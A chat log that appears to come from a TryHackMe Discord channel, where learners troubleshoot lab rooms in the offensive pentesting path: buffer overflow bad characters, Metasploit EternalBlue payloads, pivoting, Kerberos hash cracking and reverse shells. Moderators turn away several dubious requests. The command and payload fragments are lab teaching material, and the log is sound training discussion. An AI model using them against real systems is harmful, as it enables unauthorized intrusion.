I just manually inspect badchars everytime

don't find mona reliable

for finding badchars

it also could be it had another badchar from a python script I did

since I didnt terminate the machine that I got shell

let's just compare our outputs for badchar...I'll share mine

you may let me know

\x00\x16\x2f\x30\xf4\xfd

if there's any difference

not this way

but I still got a shell with x30

yeah, it does work many a times

I'm going to try manually

just check if it's the same

or you may share your ss, I'll check

btw if \x2F is your badchar, it is likely to affect the next byte ie, \x30

so we are suppose to ignore it anyways

yeah thats my fault ngl

so, was it the same?

gotta memorize the number patterns if I wanna use mona

yeah it would've been the same

great then! 🙂

actually do you know where I could find a normal hex dump picture

like for all values with no badchars

I'll share

or I could just be extra safe and use mona/check the hex dump also

yeah, for me it's best to manually inspect...and then match the result with mona's output

I just use the badchargenerator.py

and than grab the other output from mona bin

so what did you mean here?

wait I just realized thats the hex dumps output

thanks @low knot lol

Gave +1 Rep to @low knot

wait, do you need those badchars or not😆

nah I just realized thats the format of the hexdump

so I can check against that to see if any bytes are corrupted

yeah, got it then😆

np❤️

is it like compulsory to have prior coding experience to learn ethical hacking?

try some beginner rooms and TryHackMe and find out!

the short answer is no

the longer answer is if you want to be efficient you will learn as you go along to be able to at very least read/understand and modify scripts and other code, but just stick with the beginner materials and you will see what it's like

ok thx

guys i need to demolish a server

how do i do it?

??

like i need to stop it from working

like kill it

Why? What server?

i have a server which i dont have admins to, and it is taking up too much space on my discord app so i want to delete it.

Leave the server

no i dont want to leave i want to delte

But you don't have admin

It's not your server

it is

Then you have admin

on my other discrod account which i dont know the password to

We cannot help you as that would be illegal

ok

Recover your discord account through the forgotten password system

ko

Just leave the server.

ok

what does nuking mean?

In what context?

in discord

just wondering

That doesn't really provide context

like for discord servers

when u "nuke" a server?

my friend was just talking about it

I'm sure you can answer that question for yourself with Google

@vagrant vapor It involves getting high permissions then running a script to delete every single channel, role, and banning all the users.

oh

You can just delete the server

You could.

hey guys, how to connect to Corp room? Remmina and xfreerdp cant connect. In browser cant react cmd bc start cant be opened.

mtu maybe:

sudo ip link set dev tun0 mtu 1200

@weak whale

@velvet tapir thanks for replay, but not helped

Gave +1 Rep to @velvet tapir

Username is wrong maybe, dark not darkl

@weak whale

hi guys, need some help with the bof prep room

i did not understand how to identify the bad chars correctly

eh.. I wasn't familiar what is domain name

hey, this should help https://www.youtube.com/watch?v=uIFYNVqpZ0k&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=6

Is it just me or is the hydra syntax in hack park just overkill and.. seems like hydra Isn’t the right tool here. They also didn’t really give you much to go off of and you’d be hard pressed to get the right answer without looking at writeups

I quite liked it and it forced me to learn more about crafting the correct formula and got better at hydra as a result

it did take me a bit to get right however

not specifically, the main benefit would be if you struggle with things and need help, more people use kali and can offer specific advice but in general terms, it should not pose any real problem

hey

anyone here

👀

Yep

Hi

Guys I need help with the "Relevant" room please

@deep crest yes Friend.

how much time did it take you guys to finish any paths in tryhackme?

Hi guys, anyone here do the Offensive Pentesting > Buffer Overflow Exploitation > Buffer Overflow Prep ?

where can i found the EIP contains normal pattern : ... (offset XXXX) in the attached logs?

why does my jenkins command keep failing in alfred?

0BADF00D [+] Command used:
0BADF00D !mona findmsp -distance 2400
0BADF00D [+] Looking for cyclic pattern in memory
750C0000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x018bf272 (length 2400 bytes)
0BADF00D Cyclic pattern (normal) found at 0x007e394a (length 2400 bytes)
0BADF00D Cyclic pattern (normal) found at 0x007e4d7a (length 2400 bytes)
0BADF00D [+] Examining registers
on this line,,,

so sorry that i am so blind with this topic. maybe i should start other training about how to use the software. how can i expand those [+]?

you can't , your screenshot is kind of blurry, but after you run you distance command right below that line you will see the offset ,,

Hello, Is there any one who can guide me which protocol is used by port scanner or analyzer. I already know what is port scanner or ports. I'm interested
in protocol how port scanner like Nmap communicate with a target machine and get information. Btw I'm supposed to write a protocol for this from scratch.

Read up about the TCP/IP 3 way handshake

Nmap is very well documented

You won't be writing a protocol for it, you'll be writing a program for it.

Actually its my assignment just for learning. I have to design a proper format just like any other protocol follow.

I'm interested in protocol how port scanner like Nmap communicate with a target machine and get information. this protocol is just TCP

Yes I have check that but not in much detail. I have not found a proper format for a protocol but yes i have found tcp 3 way handshake, udp, tcp , these are transport layer protocol.

That's not what I'm saying

Nmap's usual scanning is just TCP port scanning.

Ahan that's helpful bro.

Please don't call me bro

okay.

You would not be writing a protocol for port scanning, the protocol is already there (TCP)

Yes, I have understood this thing. but what if i just want to analyze that how they communicate for this purpose. Am i supposed to read TCP in depth ?

You just need to understand the 3 way handshake and then you have understood TCP port scanning really

Got it mate. Thanks for helping.

Best way to understand it imo is to first learn about the theory behind the handshake etc., familiarize yourself with the protocol and then use a network capturing tool like wireshark (or tcpdump etc.) and look at the actual traffic between the target and your host. Really take your time with this!

@shell quartz Yes @shell quartz , exactly this is what I'm doing, using Nmap and capturing the traffic using Wireshark. Thanks buddy. I'll be back if I got stuck somewhere.

Gave +1 Rep to @shell quartz

Linux+ in 4 days : /

Just started maybe a week ago and I just finished Steelmountain. So maybe halfway ish through?

But I am also taking notes on github for new material

thank you, i will check it right now

Gave +1 Rep to @low knot

Np❤️

Hello, I'm on the Vulnversity room, and I am not sure how to identify which port the web server is running on.

Try nmap

I did. I am just not exactly sure where on the scan it tells me it's running a webserver

Try the -sV flag to try to identify services

Oh okay, gotcha. Thanks

Hi all !!

Anyone available for a question about the buffer overflow prep channel ??

For OVERFLOW2, I'm confused about the shellcode place in the payload, for instance, I know that 630 is the offset, next the 4 bytes for EIP and after that, I can see that there are only 265 bytes length of space available

Dont worry, Ive just figure it out what I was doing wrong

It should be enough to enumerate open ports without further information. Even if the webserver runs on a non-standard port, you can simply try communicating with all the open ports (ip:port) using the http protocol and see if it serves you anything.

For myself a lot more than the hours predicted on the front page of the paths. But I take a lot of notes also, that counts for a lot of time.

I find myself adding time to the machines for the same reason of taking notes, along with other life happenings.

dog always needs to be taken out,

Has anyone felt industry ready after using tryhackme for a while?

Not TryHackMe alone

what else would you recommend? so if you did every room in THM, that's a lot of knowledge, I did cybrary for 100 hours then came over to THM,

hackthebox, virtualhackinglabs, pwk probably

i think its good to practice all over

i was thinking of oscp free course, said that went and looked , not so easy to find, found the kali and metasploit, but not the oscp (free course), I guess people mean the syllabus,

Any good buffer overflow rooms to do before the oscp bof prep room?

Hello guys, i have questions about Buffer over flow

*I have this scenario : [Attacker-> Target1-> Target2] and a BoF exit on Target2.
Target1 and **Target2 **are on different subnet and a good pivoting already setup on the msf of **Target1 *(proxychanine and autoroute)

**My questions: **

1- should i use proxychaine ./exploit_4_the_BoF.py to test my BoF exploit from Attacker machine?

2- Should i change anything for the python code "exploit_4_the_BoF.py":
import socket ip = "Target2_IP" port = Port
......

Can I subscribe to premium for one month?

so that I don't forget to cancel.

I don’t think that’s an option. You can however subscribe, and immediately cancel. You’ll remain subbed for the month and won’t be billed the following month. I’ve done this before.

Thank you

Another option is to buy a voucher: https://tryhackme.com/subscriptions @lyric glacier

ok thanks

but why isn't there paypal option on vouchers while there is on normal subscription?

^^ @covert scarab

Honestly not sure :(

hello guys, i am stuck at brain storm room, i already have the chat server.exe but when i try to open it in immunity it shows an error (chatserver is probably not a 32 bit) and i am unable to run it

me too, about to unload my issues, lol

exactly the same issue,

Make sure you downloaded it from the FTP server in binary mode

did we download the wrong version of windows 7?

I did,

but i'll do it again,

that took a few hours to set up, did, windows 7 64, inmunity debbuger, and upgraded the python to 2.7.14, the main issue other than the file giving an error is my limited 8gb of ram, so almost impossible to run windows 10/ kali / and windows 7,,

can't seem to communicate between my kali and windows 7, when did nmap from kali (assuming I did the right ip) showed them all but 9999, seems like both boxes are sharing the same ip???

So i can see the port 9999 from my windows 10 but not from my kali box,, any ideas?

i finished daily bugle but when trying to privesc to ||jjameson||the ||config file in /var/www/html || wasnt picked up by linpeas // other enum scripts like it was supposed to be for some reason, did they change the room so it doesnt work like that anymore or is linpeas broken

ok yeah linpeas is just broken when it comes to checking for || php configs || and other scripts like linenum/lse dont hit either (probably because they dont look? didnt check)

is the procedure for getti g this fixed submitting a github issue or something dont rly know what to do (esp since idk how to fix it myself really...)

So this Offensive Pentesting path is conducive to a certification in special? I've seen references to OSCP but I'm not sure how far or close we are from it at the completion of this (awesome) tryhackme path

Hi, for "Relevant" room, Im trying to privesc, but my JuicyPotato.exe keeps getting deleted inside the machine. I ruled out AV because in that same dir, I have a msfvenom payload

Any idea whats going on?^

Quick question about Windows reverse shells. I have a simple tcp reverse shell running, from this, I’m unable to execute powershell commands nor can I switch to powershell. (It just hangs and does nothing). I tried multiple ways. What could be the reason for this? Tell me if you need more information. EDIT: I already considered execution policy

**Hello guys , i have these questions in pivoting: **

**Question 1: ** In case the pivot target don’t have SSH enable and SSH Port not Open and also metasploit not allowed to use on the attacker machine:

• What is the best open source pivoting tools we can use not to only access certain port on the third target but also to scan the entire network of the third network (similar to proxychain nmap –sT 10.10.10.10) ?
• some links I followed but none of them gave me the solution

https://orangecyberdefense.com/fr/insights/blog/ethical_hacking/etat-de-lart-du-pivoting-reseau-en-2019/ 
 https://roberthosborne.com/pivoting-proxies 
 https://nullsweep.com/pivot-cheatsheet-for-pentesters/ 

Question 2: How we can manually setup all the configuration on a pivot target instead of using the “run autoroute 10.10.10.10” in msf ?

**Question 3:**I am using the “multi/http/php_cgi_arg_injection” exploit with this payload “php/meterpreter/reverse_tcp” to exploited and httpd service

Exploitation success but the problem is that whatever I type in the meterpreter session from CLI like whomami an error message pop up “command not found”.
-So, What It cab the problem?

• some links I followed and they face the same issue:
  https://www.youtube.com/watch?v=r4HqXu5mHuA&t=169s
  https://medium.com/hacker-toolbelt/metasploitable-2-iv-port-80-5b90a0a22cb`6

1. Chisel is good. If you have an SSH client installed on the target then you can still use SSH to pivot with a reverse proxy.

2. No idea
3. Meterpreter commands are not the same as shell commands. You can drop into a shell with the shell command.

thanks a lot , SSH client not installed on the target so chisel not useful in my case , and 3.shell command even not found.

Gave +1 Rep to @keen iris

Chisel will be useful

Chisel is not dependent on SSH

I recommend completing Wreath. It will teach you a lot of different pivoting methods.

Yeh yeh for sure, chisel have some limit because u cant use to scan an external network like proxychaine with nmap , correct me if am wrong plz

I don't use chisel much

But work through Wreath

Hey, I am looking for a room that will teach me to use docker for privilege escalation, but could not find one. Is there such a room or do I have to check for other sources?

@charred cedar Something like thise:https://tryhackme.com/room/dockerrodeo

thanks!

Oh I just found out that there is a search function on tryhackme 😅 Well that will at least prevent future questions by me regarding stuff like that

I think THM is loading slow

Hi everyone, I'm at "Attacktive Directory", and one of the questions say "What tool will allow us to enumerate port 139/445?"

It doesn't recognize the tools I've used to enumerate SMB

I already completed the room, but I'm stuck with this question. Not sure what it's expecting me to type in 🤔

Nevermind 🤦‍♂️

Hi guys, when I enter the command airodump-ng wlan0, it isn't displaying the list of networks available. The chipset used in my wifi adapter is ralink and the name of the adapter is Leoxsys LEO-HG150N.Please help me, thanks

Please ask in #infosec-general

👍🏼

Can anyone share some alternative ways to root the “Relevant” box with me pls? The path I used was pretty obvious, spending more time with the box, I’m struggling to find another way.

Hi, I'm querying info with Bloodhound, but it froze my VM. I have allocated 2 cores and 4 GB ram. Is that low? I can't find PC system requirements for Bloodhound in the Docs

(I'm using a Parrot OS as an attack box)

Hello, is there any way to get a regular command prompt with Evil-WinRM ? When I try, it immediately swap back to the powershell. Just curious

I am a newbie any ideas where i can start

Check out #start-here

i did and i found my self here

it said i can get help in on of these paths

To be a little more specific, it says help with rooms on those paths

Rooms, and the paths, are a feature of TryHackMe.

oh

what is this server

This discord server is the community for TryHackMe.com

TryHackMe is a platform for learning and teaching cybersecurity.

oh right i looked at the first room and said install a vpn

and other direction which i dint understand

Yeah, you'll either need to set up the TryHackMe VPN or use the TryHackMe attack box in order to communicate with the target machines you deploy

If you're hacking a machine. you need a target and a machine to attack from

Im having issues with the Brainstorm room. The chatserver executable crashes instantly when ran. I've tried win 7,8, and 10 vms both 32 and 64bit. When opened with Immunity Debugger, the executable just hangs. Any help?

Answered in #site-support

hi all, why that "16" in nmap -sn 172.16.0.0/"16"? I'm afraid I don't understand why exactly 16...

That is the CIDR notation, in which an address or routing prefix is written with a suffix indicating the number of bits of the prefix, such as 192.0.2.0/24. This would be 24 bits to specify the network, leaving 8 bits to specify/identify the host. You could start reading about subnet masks and their purpose and eventually you will understand it, its not difficult.

Hello guys, Im just getting into this thing, and I wanted a little clarification. So i'm currently doing the Skynet Room in this path and the machine keeps crashing on me or smth like that. Goes unresponsive...kinda in cycles...I got pretty far but it bothers the hell out of me, that it freezes and I have to carefully wait till it goes up and try stuff...is it ok and I just have to power through it or something is wrong and I should try this room later?

Sounds like a VPN issue rather than a room issue

hm I tried to switch the vpn from vip eu to vip eu 2 still no luck

but thank you, ill look into it

how much ram are you giving your kali box? are you using attack box or openvpn? sounds to me like your vm doesn't have enough ram allocated to it.

@velvet tapir Hello me

ohhh lol

🙂

Hey there, Im trying to gain access to the machine windows machine in the room "blue", but when in metasploit, I keep Failing on "Triggering free of corrupted buffer." and I have tried alot of times, not all in the same session, but it never completes. Any help?

so for bufferoverflow setup, am i supposed to run windows vm inside my kali box?

sounds like options or payload not correct, what payload are you using?

I have been using "windows/x64/shell/reverse_tcp" and every so often, I have tried "windows/x64/meterpreter/reverse_tcp".

wrong payload

What payload am I supposed to be using, since the room says: "set payload windows/x64/shell/reverse_tcp"

my bad

windows/x64/shell/reverse_tcp

options

?

Yeah, that is what I have been using most of the time, and every so often, I have tried meterpreter

Even meterpreter gets the same error though

do you have all your options correct?

I think so

so you have a meterpreter prompt?

not right, now, I was trying it earlier, and the machine kinda just died off. I can pull it up now though

Hi anyone doing https://tryhackme.com/room/attackingkerberos ?

if you got to meterpreter that's pretty much it,

Well, what I do is:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS (machine IP)
set payload windows/x64/shell/reverse_tcp

That is what It says in the room

and with "set payload windows/x64/meterpreter/reverse_tcp" it does almost the exact same thing, and still just fails on "Triggering free of corrupted buffer."

And what I have read, it says that it does fail quite often, but Ive done it alot of times, and it still hasn't worked

my q got drowned lol, everything looks good, i'm going to fire up that room , curious now,

Okay, thanks :p

check your LHOST

@velvet tapir My LHOST = 192.168.200.16

that is my VM IP

Needs to be your tryhackme VPN IP

Oh

Well

That does make more sense

Thanks :\

so if my question gets drowned up there can I repost it? ?

That's one way of doing it

so for bufferoverflow setup, am i supposed to run windows vm inside my kali box?

so windows 10 running oracle VM with kali and windows 7 as boxes, open both and can't ping VM(kali) => VM(win7) , I can ping (win7) from host (windows 10) but not VM to VM,

will this set up work?

Virtualbox, I recommend making a NAT Network and putting kali and windows on it

the standard NAT means the VMs aren't on the same network

ohh, I was trying to seperate them,,, Nat and Nat1

But... you wanted to communicate between them?

yes, let me try putting them on the same nat network, makes much sense , I was already trying to put VM on my kali box, but I think with my limited 8gb, would be better off running two boxes with 2gb each,

thank you @keen iris

Gave +1 Rep to @keen iris

Don't do nested VMs

ohh ok, so the set up of running both boxes under one vm manager is the preferred way, just the boxes where not on the same network,

omg finally,,,,,,, yes,

is anyone available who has done the buffer overflow prep room? can you help me understand something during the finding bad chars section

hi all, I'm at the network services learning room, task 4 (exploiting SMB), I think I made all, but when I try the ssh it demands the password, how can a I find it? (made the chmod 600 as it says and I've seen the user, but it demands the password). I am a little lost with it.

sorry, done, with the -i flag...

You are probably stumbling over the fact that bytes appear to be bad because they get affected by the byte before? So if two consecutive bytes appear to be bad, you can either just exclude both or remove the first one from your payload and then check again if the second still appears to be bad. I always check this manually, I guess mona could make it easier as explained in the room I think, I prefer using my eye-sight.

show your command

As dombg said if there are two badchars consectutively it is quite likely the first char has modified both, so I normally exclude the first char from all consecutive pairs and retry to see if any of the second chars were also bad. If you have some other query I did this room recently so might be able to answer

hey guys yeah that was what i was confused over, in the tiberius video where he follows along he kinda like "skips" a step which confused me but i kept watching and he basically said its better to check each badchar one by one which made it easier for me - thank you

Gave +1 Rep to @fleet forge

any best tool for penetrating android
dont give metasploit
i dont remember it but it also used fatrat
and then a apache server opens
where the data is dumped i guess

anyone?

That sounds pretty dodgy, whats the intent?

i'm penetrating my phone only.....

well i,m good with windows penetration just lerning android

can u?

name any

As a new username we can't verify your intent so I can't really help you I'm afraid.

c,mon im just learning

When someone joins and immediately asks sketchy questions we try to tread lightly.

so you are asking me to say hi hello first idk how will this help in my learning

i just had a doubt so i asked?

!

anyone?

i,m sorry i got what i want

noice

I'm new to THM so maybe this is a silly question but i'm stuck on BurpSuite i'm running through the Proxy section and i've started the machine i'm not using the open vpn just the machine that has everything already recommended. I am on the step where you are in the intercept section and you enable it and open the browser but i get an error. Net.portswigger.devtools.client aj: Refusing to start browser as your current configuration does not support running without sandbox.. Anyone know how to fix this?

how do you get a meterpreter from a payload without them clicking it

What's your goal here?

is there a way?

Why?

Yes, there are ways. But why?

i would just like to know

For what purpose?

white hating

not hating

white hat

ing

👀

didnt mean it like that

i am white

doesnt matter

what are inject payloads

anyone know of any good tutorials/articles for port forwarding? 🙂

well, I'm not at that room at the moment, but it was just that I forgot the -i flag, it's already resolved 😉

Hi guys

I've recently subscribed THM and was doing Offensive pentesting path and I am stuck in game zone room

I can't get a reverse shell. Can anyone help!

If a reverse shell isn’t working, maybe it’s not the path. Keep enumerating versions and check exploitDB.

I got the root flag by exploiting Webmin 1.580

Simply using navigation from url

But I wanted to get a shell

Ah, the other website…. I’ll have to take a look back at the notes to see what I did. Check the ports you’re connecting back to, may be blocked outbound.

Okay

Hi, I'm at "Corp" and when I try to rdp into the machine, the window goes pitch black

The rdp window I mean. And then nothing, I have a black screen

Just realised I did brainpan in a completely unnecessary harder route 🤦

If its for pivoting: https://youtu.be/DQ7GA92Eewo

Question on GameZone. On the last task for using the MSF/ exploit and I am getting an Authentication failed error. But I've setup the payload/rhost/lhosts etc correctly. Has anyone else gotten that error before on this box?

Type options, double check

Should be RHOSTS and LHOST

Not RHOST and LHOSTS

Just checked and its labeled as the top

spoke too soon

:slaps forhead: got in

I did the same thing but couldn't get a connection

Is your SSH running? Make sure you are still logged in as the regular user then re-run the MSF exploit

Yep I was and I also wanted to do it manually but that also didn't work

hello im new here hope we can help each other

thank you

can someone teach me about html?

Take a look at this walk- through, they give a good way to manually do it https://ratiros01.medium.com/tryhackme-game-zone-b41874804d4e

Thanks

Gave +1 Rep to @dire saddle

Can I dm you? @fleet wedge

Yeah shoot away

huh?

@edgy current This channel is for the THM path.

what do you mean exactly? Sorry, I'm a beginner.

and what channel should I ask for help regarding that then?

You already asked in #infosec-general

And then deleted it?

no I asked in #quiet-conversation and here.

I will be honest, kinda sketchy anyway so we'd prefer it wasn't here.

I know it will sound sketchy, but I just wanted to know where exactly I could ask for help (if somebody would be willing to). So should I message in #infosec-general ?

Preferably not in this discord

We have to draw a line somewhere, and that's the line

ohh okay thanks for clarifying.

Gave +1 Rep to @keen iris

tho what is this channel exactly for? @keen iris

The offensive pentesting path on tryhackme

so I just logged in on THM, but this is my first time there. Is there a way that I can dm you, so that you can guide me? @keen iris

Not really

ok cool.

In the SteelMountain room: if we are using the attackbox it already has 80 port in use,so I changed the script to use http://<attackers_ip>:8080/nc.exe and opened a webserver using python3 -m http.server 8080. While running python 39161.py <Target IP> <Target Port>, I get the following error: " Don't forgot to change the Local IP address and Port number on the script"""
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("""[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
Don't forgot to change the Local IP address and Port number on the script""")?" I think using server 8080 does not work as it is a comment. Any idea how to get past this

I am using attackbox

It's a python2 exploit

You're running it with python3

I did run python2 -m SimpleHTTPServer 8080, however the syntax error remains. Do I need to change the script apart from local IP and port?

ok got it I have to use python2 on the command as well. python2 exploit.py target ip target port. Thanks

I think the issue is that I am using attackbox and it uses port 80. The script does not work if I use port 8080 since it requires port 80 and port 80 is being used. Any ideas?

basically what I am asking is, Is there a way to run a webserver on port 80 on attackbox?

as far as I'm aware, no, there isn't

so some rooms and exploits can only be done via VPN connections right?

you would either have to user your own VM or change the exploit code so it uses a different port, but I wouldn't have any idea how to do that

Thank you

np

You can edit the script

You can SSH into the attackbox, then kill the service

Port 80 is used for the fullscreen thing

thanks for the tip

Gave +1 Rep to @keen iris

is the offensive path based on the beginner path?

or is it safe to skip if you know how to use linux

You could do with knowing the basics of cybersec and webapp first

what does basics of cybersec include? i already know the basics about webapps i guess

I'd take a look and see what the beginner path covers, and if you're confident with those then see

No shame in deviating from the Offensive path if you want to learn more about something specific

yeah makes sense, thanks

I have two hidden IP but i am not sure how to add them route table manually

could anyone help ?

Anyone done brainstorm or gatekeeper?

Question for gatekeeper:
Why doesn't enum4linux show me any shares but smbclient -L do?

Question for brainstorm:
I couldn't get chatserver.exe running no matter what. I transferred the file to a Windows VM and when I double click on it. Nothing happens. If I open and run it in immunity debugger, immunity debugger pauses almost immediately. (I'm running as an admin). Please help

Sudo route add

Make sure you download the files in Binary mode from FTP

Thank you!!

Gave +1 Rep to @keen iris

hey, one of the tasks says to go over the burpsuite room if you don't know what it is/to set it up, but it seems to be locked for subscribers

what am i supposed to do

?

Get familiar with it another way?

Hi, in the Relevant room, what's the other way to the root? Tried to find it but no success. Thanks 🙂

OS:SCAN(V=7.91%E=4%D=5/31%OT=21%CT=1%CU=30362%PV=Y%DS=2%DC=I%G=Y%TM=60B517A
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=105%GCD=1%ISR=107%TI=Z%CI=I%TS=8)OPS(O1=M506ST11NW6%O2=M506ST11NW6%O
OS:3=M506NNT11NW6%O4=M506ST11NW6%O5=M506ST11NW6%O6=M506ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSN
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
I receive this when I run nmap -O and the machine ip on VulnUniversity room

is this normal?

I cant see the machine OS, can someone help me?

Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
minutes ago I ran the same nmap -O ip and i received this message above and I just ran the command again

idk what is happening

linux

I know that is it but it does not work, there are six * on it

Ok, so do -sV

It's probably asking for the distribution rather than just Linux

thank you 👍

probably missing something dumb here, could I get a sanity check on the xfreerdp command? I can't find a working combination. This is for the post exploitation room

xfreerdp /u:Administrator /p:P@$$W0rd /v:<IP> /d:CONTROLLER 

With some investigation it seems the error is due to bad creds? but I have cp them directly from given...

[14:26:24:560] [53182:53183] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[14:26:24:560] [53182:53183] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[14:26:24:560] [53182:53183] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[14:26:24:560] [53182:53183] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

I figured the above out, dollar signs in the pw were not escaped 🤦‍♂️

I am trying to install Immunity Debugger in my Kali machine using Wine for solving BOF rooms.

But it's not installing as Python 2.7.1 isn't in my machine. How can I do the installation?

try to see if it's compatible with any other python version

Hello ,i am stuck in the module move that shell,it say exploit completed but no session was created ,I am using a Kali VM(bridged with Metasploitable2) and Open VPN

LHOST is wrong

Lhost should be the Private IP of the Open vpn

Yes.

ok let me give a try

Hi everyone, i'm having this problem with msf "Unable to find accessible named pipe!" anyone has ever been through this on windows 8.1 pro

Is this related to a tryhackme room or the tryhackme offensive pentesting path?

offensive pentesting path

Ok, what room in the path?

At times I setup a python3 http.server when required in some rooms. Those webserver sometimes responds with 501 or 401 even when nothing was requested from this server

Is this strange or expected behavior?

do you have a screenshot?

Something was requested

Doesn't mean it was you that made the request.

usually it will display the requester address, if you are scanning the system with something else at the time it might be that hitting it

Just curious who else will make a request to a webserver running on attackbox? Or what service?

If it's exposed to the internet, then botnets etc.

So if you're a subscriber

I closed the attackbox but will be on the lookout

Ahh ok makes sense. Thanks

Gave +1 Rep to @keen iris

from where should i start

i am new in this field

"Complete Beignner"

ya almost

?

i know some basic linux commands and c

I meant start the "Complete Beignner" Learning Path

where is it

https://tryhackme.com/hacktivities

There are multiple learning path. If you are a complete beignner start with that

Thank you so much

Gave +1 Rep to @radiant plaza

Hello , I am unable to install "Gobuster" , i am using "sudo apt-get install gobuster", its failing with an error :
The following NEW packages will be installed:
gobuster
0 upgraded, 1 newly installed, 0 to remove and 32 not upgraded.
Need to get 2,019 kB of archives.
After this operation, 6,759 kB of additional disk space will be used.
Err:1 http://http.kali.org/kali kali-rolling/main amd64 gobuster amd64 3.0.1-0kali1
404 Not Found [IP: 192.99.200.113 80]
E: Failed to fetch http://http.kali.org/kali/pool/main/g/gobuster/gobuster_3.0.1-0kali1_amd64.deb 404 Not Found [IP: 192.99.200.113 80]
E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing

maybe run apt-get update or try with --fix-missing

can anyone help me fixing this?

apt even tells you what to do

i tried ,b it didnt work

It can't find the deb file online. Try navigating to it on a browser and download it manually

In fact, just a thought, are you still connected to the VPN?

THM VPN doesn't touch your internet traffic

I can never connect to the Internet on my machine when I'm connected to the VPN..... I best get that checked out lol

Don't use the VPN manager. Use the command line.

Don't do this though.

Cool will try that. Thanks

Would anyone know any good rooms to do to prepare for the CEH practical?

@trim cloak If you have CEH syllabus - you can search for the matching THM rooms that way to keep on task.

how can i delet my browser hystory?

lol

😉 😏

guys anyone did the bof prep room here?

I did everything as explained, tried almost 10 different shellcodes
and I found the right bad chars
yet I cant get a shell

:(

you should verify multiple times each parameters of your exploit.py, your msfvenom command (right ip, right listener port) ... There's no magic you just have to be extremely careful to each step :/

which bof number are you struggling on ?

@lone gulch got it already
thanks for helping
my issue was in the payload's layout

Gave +1 Rep to @lone gulch

In the room Retro, why does the reverse php shell not work? tried it on the 404 and as a plugin, it connects and then drops, this is the second room where this happens, just curious.

@velvet tapir yeah I had the same issue , shell would vanish at each command.
But as long as i remember ||you can root this machine without getting a reverse shell ||

I’m thinking a firewall , or something in the theme since it’s a custom theme

looks like I am starting the path 🙂 Not a Noob, just passed eJPT! I know some Linux and networking

Using the nmap flag -n what will it not resolve? ( i dont understand the question)

the answer are in 3 stars (***)

found answers

Good Morning. In Vulnversity, I perform a nmap scan and port 3333 is not open. Any intel?

At a guess, you're scanning your own machine rather than the target

I will check. Thanks.

yey!!!! 100% done,

powershell room and corp room reminded me of when I was doing a react app and linking api to spotify, very glitchy

#offensive-pentesting-path

How to crack Kerberos hash? I get this error using hashcat.

SLMail Buffer Overflow
I am trying to set up the SLMail vulnerability via the Buffer Over Flow room and am running into the problem when i do the install as admin and restart the application it kicks me out of my connection.

Steps I took:
(1) xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea
(2) home network
(3) Opened vulnerable folder
(4) Run SLMail55_4433 as admin
(5) go through set-up process and only bind to local host IP addy
(6) Then asks me to restart machine and when I do I get kicked from the logon via xfreerdp

Is there a way to work-around this?? I use the attack machine provided online?

search for the mode.

the first 4 char is what you need

hashid -m

I use this command: "hashcat -m 13100 -a 0 hash.txt rockyou.txt"

It's Kerberos 5

How do I request support properly? I'm having an issue when I shouldn't.

Email support@tryhackme.com for official support

Hey Everyone, I am trying to set up an OpenVPN connection but when I try to download the VPN configuration files it gives me a 404 error. Is there somewhere else these are stored. Thanks!

This is probably more of a #site-support issue, but maybe try a different vpn server?

Ah good point I will try #site-support, thank you!

@knotty lily I was able to get the US East Regular to download, thank you.

Gave +1 Rep to @knotty lily

you're welcome!

i used to remove the "-a 0" try it that should work.

Okay

can i ask few question about certifications here ?

Ask in #cyber-and-careers. 🙂

Go to archives, there’s a link to a chat about it with slides

Thanks @velvet tapir

Gave +1 Rep to @velvet tapir

Thanks @quaint garnet

Rep cooldown.

You're welcomed

+rep @quaint garnet

Gave +1 Rep to @quaint garnet

I'm on Gatekeeper and I can't run the file in my local windows vm the errors is - The code execution cannot proceed because VCRUNTIME140.dll was not found. - I've gotten with file both with get and mget and I've search for that dll file and cannot find. I also spend 3 days trying to find a solution I looked through all the walkthrough - they dont have this problem and they dont need a dll file - and I looked through all the Gatekeeper related questions here and nothing. This is my last box before completing this path :/

hello i am doing offensive pentesting module, my machine does not match the machine in the video, the answer neither

!docs verify

Follow these steps, and then please send an image showing what you mean

i cant send an image

!docs

That's why I told you to follow the steps in the link.

!docs

now im subscriber

my virtual machine is not the same as the one in the vide

You are scanning the attackbox

Not the target machine

